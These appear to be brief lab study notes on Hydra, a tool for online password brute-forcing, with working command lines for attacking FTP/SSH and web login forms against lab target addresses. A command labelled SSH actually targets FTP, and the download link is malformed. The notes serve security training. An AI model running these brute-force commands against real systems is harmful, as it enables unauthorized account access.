Hydra is a tool used for brute forcing passwords online.
We can brute force against websites that use services like SSH, Web application forms, FTP, SNMP, or VNC
Installing Hydra (Pre installed on Kali)
Download – https://github.com/vanhauser-thc.thc-hydra
Example hydra commands
SSH
hydra -l user -P passlist.txt ftp://10.10.62.189
Post web forms
sudo hydra <username> <wordlist> MACHINE_IP http-post-form "<path>:<login_credentials>:<invalid_response>"
hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
hydra -l <username> -P <wordlist> 10.10.62.189 http-post-form “/:username=^USER^&password=^PASS^:F=incorrect” -V
Test example involving attackbox in brute forcing ssh
